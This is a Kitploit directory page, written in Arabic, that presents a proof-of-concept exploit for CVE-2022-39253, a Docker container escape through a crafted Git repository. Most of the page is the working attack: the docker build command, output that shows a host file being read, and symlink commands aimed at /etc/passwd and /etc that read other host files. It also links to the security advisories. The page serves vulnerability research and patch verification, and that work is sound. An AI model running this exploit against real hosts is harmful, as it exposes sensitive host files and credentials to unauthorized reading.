Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
docker-cve-2022-39253-poc — إثبات مفهوم لاستغلال CVE-2022-39253 يوضح الهروب من حاوية Docker عبر بناء مستودع Git خبيث، مما يتيح الوصول للقراءة إلى نظام الملفات المضيف. | Kitploit
أدوات/GitHubGitHub/ssst0n3/docker-cve-2022-39253-poc
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالأمن الويبالهروب من الحاوية
GitHubssst0n3/docker-cve-2022-39253-poc

docker-cve-2022-39253-poc

إثبات مفهوم لاستغلال CVE-2022-39253 يوضح الهروب من حاوية Docker عبر بناء مستودع Git خبيث، مما يتيح الوصول للقراءة إلى نظام الملفات المضيف.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
1053منذ سنة واحدةلم تتم المراجعة بعد

قراءة ملف المضيف في docker (باستخدام cve-2022-39253) poc

PoC

بيئة إعادة الإنتاج
root@kitploit:~
$ docker run --name=cve-2022-39253 -ti -d ssst0n3/docker_archive:git_cve-2022-39253
$ docker attach --detach-keys ctrl-x cve-2022-39253
# (use ctrl-x to exit container's terminal)
# (wait minutes for environment starting ...)
...
Ubuntu 22.04 LTS ubuntu ttyS0

ubuntu login: root
Password: root

root@ubuntu:~# apt list --installed |grep "git/now"

WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

git/now 1:2.34.1-1ubuntu1.2 amd64 [installed,upgradable to: 1:2.34.1-1ubuntu1.6]

root@ubuntu:~# docker --version
Docker version 20.10.19, build d85ef84
root@kitploit:~
echo "*************escaped*************" > /tmp/escaped
docker build https://github.com/ssst0n3/docker-cve-2022-39253-poc.git#main
root@kitploit:~
Sending build context to Docker daemon    234kB
Step 1/4 : FROM busybox
latest: Pulling from library/busybox
45a0cdc5c8d3: Pull complete 
Digest: sha256:3b3128d9df6bbbcc92e2358e596c9fbd722a437a62bafbc51607970e9e3b8869
Status: Downloaded newer image for busybox:latest
 ---> 334e4a014c81
Step 2/4 : COPY / /
 ---> 9f2e7d6efffd
Step 3/4 : RUN ls -lah /.git/modules/evil/objects/host
 ---> Running in e21e9a9c8294
-rw-r--r--    1 root     root           8 Dec 21 02:26 /.git/modules/evil/objects/host
Removing intermediate container e21e9a9c8294
 ---> c87453ca2a37
Step 4/4 : RUN cat /.git/modules/evil/objects/host
 ---> Running in a0463dca30b7
*************escaped*************
Removing intermediate container a0463dca30b7
 ---> 2330735e84e4
Successfully built 2330735e84e4

كيفية قراءة ملف أو دليل آخر

root@kitploit:~
ln -s /etc/passwd evil2/git/objects/host

أو

root@kitploit:~
ln -s /etc evil2/git/objects/host

يمكنك حتى قراءة الدليل الجذر /.

النشرات الأمنية

  • https://github.com/moby/moby/security/advisories/GHSA-vp35-85q5-9f25
  • https://github.com/git/git/security/advisories/GHSA-3wp6-j8xr-qw85
تنزيل الأداة